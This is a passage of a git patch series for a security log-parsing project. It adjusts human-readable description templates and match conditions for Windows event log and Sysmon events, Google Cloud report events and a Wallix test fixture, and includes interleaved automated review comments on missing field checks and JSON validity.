"conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", 
+ "value": 22 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, { "value": "Auditing event on {winlog.computer_name}: {event.action}", "conditions": [ From a68dec425ee56f45f66ae948e194e23595e86436 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:44:03 +0100 Subject: [PATCH 040/150] Small fixes --- .../winlogbeat/_meta/smart-descriptions.json | 51 ------------------- 1 file changed, 51 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index 5eaf6dc64..a3b786729 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1134,12 +1134,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "event.action" } ] }, @@ -1149,15 +1143,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.SubjectUserSid" - }, - { - "field": "event.action" } ] }, @@ -1171,15 +1156,6 @@ { "field": "event.action", "value": "Filtering Platform Connection" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.event_data.SourceAddress" - }, - { - "field": "winlog.event_data.DestAddress" } ] }, @@ -1189,12 +1165,6 @@ { "field": "winlog.provider_guid", "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" - }, - { - "field": "host.hostname" - }, - { - "field": "event.original" } ] }, @@ -1204,12 +1174,6 @@ { "field": "winlog.provider_guid", "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" - }, - { - "field": "winlog.opcode" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1219,9 +1183,6 @@ { "field": "winlog.provider_guid", "value": "{00000000-0000-0000-0000-000000000000}" - }, - { - "field": "winlog.computer_name" } ] }, 
@@ -1231,12 +1192,6 @@ { "field": "winlog.provider_guid", "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1246,12 +1201,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, From 60cfdc0bd0210d65b78ff4ef5cdbb8b25c7dcfc7 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:58:27 +0100 Subject: [PATCH 041/150] Fixing details in smart description to avoid NULL --- .../winlogbeat/_meta/smart-descriptions.json | 426 ++++++++++++++++++ 1 file changed, 426 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index a3b786729..ee074adf6 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json 
@@ -668,6 +668,158 @@ } ] }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] 
+ }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", "relationships": [ @@ -693,6 +845,9 @@ }, { "field": "source.ip" + }, + { + "field":"host.hostname" } ] }, @@ -776,6 +931,26 @@ } ] }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", "relationships": [ 
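Review bot: The two new `on {host.hostname}` variants (both the `{user.name}` and the `{user.domain}\\{user.name}` form) keep a `"target": "source.ip", "type": "reconnected from"` relationship although their conditions only require `host.hostname` and the rendered value never uses `source.ip`, so a 4778 record without a source address still emits a relationship with an empty target — the NULL this commit sets out to avoid. Drop that second relationship object from both entries and keep only the `reconnected on session` one, as the bare `{user.name} reconnected on session …` variants already do. Separately, none of the six entries checks that `user.name` or `user.domain` is present (unlike the Sysmon process entries added later in this commit), and the `{user.name}` variants are listed before the `{user.domain}\\{user.name}` ones with a strict subset of their conditions; if descriptions are matched first-hit (not visible here), the domain-qualified text is never chosen, which matters for a session-reconnect event where the account's domain and origin IP are exactly what an analyst needs.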
@@ -793,6 +968,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" } ] }, 
@@ -969,6 +1147,191 @@ } ] }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + 
"target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, { "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", "relationships": [ @@ -1011,6 +1374,18 @@ { "field": "event.provider", "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, 
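Review bot: Every new Sysmon event 1 variant gates the description on `process.executable`, `user.name` and `host.name`, yet its relationships also read `process.command_line`, `process.parent.command_line` and `process.parent.name`, none of which has a presence condition, so a record without a parent command line (plausible when the parent has exited or is a system process — to confirm against real winlogbeat samples) still emits relationships with an empty endpoint. Either add `{ "field": "process.command_line" }` and `{ "field": "process.parent.command_line" }` to the conditions, or add a fallback variant whose relationships stop at `user.name -> process.command_line` and `process.command_line -> process.executable`. Also, the `created by {user.name}` variant precedes the `created by {user.domain}\\{user.name}` variant with a strict subset of its conditions, so if matching is first-hit the domain-qualified form is unreachable; listing the most specific variant first would avoid that, and for process creation the account's domain is often what separates a local admin from a domain account.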
@@ -1148,6 +1523,57 @@ }, { "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", From 1e1d1a72d4c376dd3741994d319e44d0a33c2795 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:03:25 +0100 Subject: [PATCH 042/150] small fix --- Beats/winlogbeat/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index ee074adf6..b3a3257b7 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -16,6 +16,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" } ] }, 
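Review bot: The three new `Filtering connection …` fallbacks render `{winlog.computer_name}` without a presence condition on it, while the previous commit in this series (`[PATCH 040/150]`) removed exactly that `{ "field": "winlog.computer_name" }` check from the full variant, so a record missing the computer name now degrades to `Filtering connection on ` instead of to a shorter description. Add `{ "field": "winlog.computer_name" }` to the three variants that render it and keep the bare `Filtering connection on {winlog.computer_name}` entry as the final catch-all. More important for triage, all four variants match only on the provider GUID and `"event.action": "Filtering Platform Connection"`, so permitted and blocked connections receive identical wording; the dedicated 5156 entry earlier in this file says `allowed a connection`, and an `action.outcome`-conditioned pair (as the 5140/5145 entries use) would let the description carry the allow/block outcome, assuming that field is populated for these events — not verifiable from this diff.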
@@ -42,6 +45,9 @@ "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" }, + { + "field": "action.properties.LogonType" + }, { "field": "source.ip" } From 5a3e4861db9637ed8dcc5b49ebbcf8cfce42586b Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:10:35 +0100 Subject: [PATCH 043/150] change from event.provider to winlog.provider_name --- .../winlogbeat/_meta/smart-descriptions.json | 130 +++++++++--------- 1 file changed, 65 insertions(+), 65 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b3a3257b7..b720b4ffb 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -14,7 +14,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -42,7 +42,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -68,7 +68,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -88,7 +88,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -113,7 +113,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -136,7 +136,7 @@ "value": 4634 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -156,7 +156,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -176,7 +176,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { 
@@ -200,7 +200,7 @@ "value": 4662 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -220,7 +220,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -240,7 +240,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -285,7 +285,7 @@ "value": 4688 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -305,7 +305,7 @@ "value": 4689 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -325,7 +325,7 @@ "value": 4720 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -345,7 +345,7 @@ "value": 4722 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -365,7 +365,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -389,7 +389,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -413,7 +413,7 @@ "value": 4725 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -433,7 +433,7 @@ "value": 4726 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -453,7 +453,7 @@ "value": 4727 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] 
@@ -473,7 +473,7 @@ "value": 4742 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -493,7 +493,7 @@ "value": 4744 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -513,7 +513,7 @@ "value": 4750 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -533,7 +533,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -553,7 +553,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -577,7 +577,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -597,7 +597,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -621,7 +621,7 @@ "value": 4771 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -641,7 +641,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -665,7 +665,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -694,7 +694,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -722,7 +722,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { 
@@ -745,7 +745,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -770,7 +770,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -798,7 +798,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -821,7 +821,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -846,7 +846,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -872,7 +872,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -892,7 +892,7 @@ "value": 4798 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -912,7 +912,7 @@ "value": 4799 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -932,7 +932,7 @@ "value": 4825 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -952,7 +952,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -972,7 +972,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -995,7 +995,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] 
@@ -1015,7 +1015,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1039,7 +1039,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1059,7 +1059,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1083,7 +1083,7 @@ "value": 5156 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1096,7 +1096,7 @@ "value": 4103 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1109,7 +1109,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1122,7 +1122,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1135,7 +1135,7 @@ "value": 4105 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1148,7 +1148,7 @@ "value": 4106 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1183,7 +1183,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1224,7 +1224,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1278,7 +1278,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1327,7 +1327,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { 
@@ -1378,7 +1378,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1415,7 +1415,7 @@ "value": 2 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1435,7 +1435,7 @@ "value": 3 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1448,7 +1448,7 @@ "value": 11 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1465,7 +1465,7 @@ "value": "CreateValue" }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1478,7 +1478,7 @@ "value": 13 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1491,7 +1491,7 @@ "value": 16 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1504,7 +1504,7 @@ "value": 22 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] From b1252eaca9c4f4450874f6f8943795476e8ed8e3 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:36:26 +0100 Subject: [PATCH 044/150] apply linter --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 0e522bee5..ded77dffa 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + google.report.saml.application_name: description: Saml SP application name name: google.report.saml.application_name From 19a65a4d5e293e1d2fdbfa64529dc10caee206c9 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:40:52 +0100 Subject: [PATCH 045/150] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 4cf8bb8e7..9e00ad24a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -215,6 +215,10 @@ }, { "field": "google.report.rule.type" + } + ] + }, + { "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", "conditions": [ { From 9ff46d902883e220abb1678fe65f6151d46ab06c Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:44:32 +0100 Subject: [PATCH 046/150] Fix fields --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ded77dffa..21d6f4ee1 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + type: keyword google.report.saml.application_name: description: Saml SP application name From c99c1228b8eba92184a6a6ca972ffea8034cd286 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 15 Nov 2024 12:03:00 +0100 Subject: [PATCH 047/150] test(Wallix): remove useless test --- Wallix/wallix-bastion/tests/rexec.json | 12 ------------ 1 file changed, 12 deletions(-) delete mode 100644 Wallix/wallix-bastion/tests/rexec.json diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 
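Review bot: The four added lines in `@@ -215,6 +215,10 @@` close an entry whose `]` and `}` and the `{` opening the next entry were missing, so the previous revision of `_meta/smart-descriptions.json` was not parseable JSON (the `"value"` line followed `"field": "google.report.rule.type"` with no separator), and commit 050 further down (`@@ -263,7 +270,6 @@`) removes a condition object that carried two `"field"` keys, which most parsers accept silently by keeping the last one. Neither state was caught before being committed, so a CI check that loads every `_meta/smart-descriptions.json` with a strict parser and rejects duplicate keys (in Python, `json.loads` with an `object_pairs_hook` that raises on a repeated key) would turn both kinds of slip into a failing build instead of a blank or wrong description at render time. The same check would also have flagged the repeated `"field"` that commit 052 later removes.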
--- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null @@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file From 3c5145e8f49c9fd9c07d4f2af1d4cf491bdbbc35 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:25:48 +0100 Subject: [PATCH 048/150] Add chrome service --- .../_meta/smart-descriptions.json | 57 +++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++++++ .../tests/test_chrome_sample_1.json | 47 +++++++++++++++ .../tests/test_chrome_sample_2.json | 45 +++++++++++++++ 4 files changed, 169 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_2.json diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6fa8c709a..0ac5acfe5 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
@@ -282,6 +282,63 @@ } ] }, + { + "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.id" + } + ] + }, + { + "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, + { + "value": "The user on device model {device.model.name} log in due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 3a0fce88f..c92e4bf32 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google 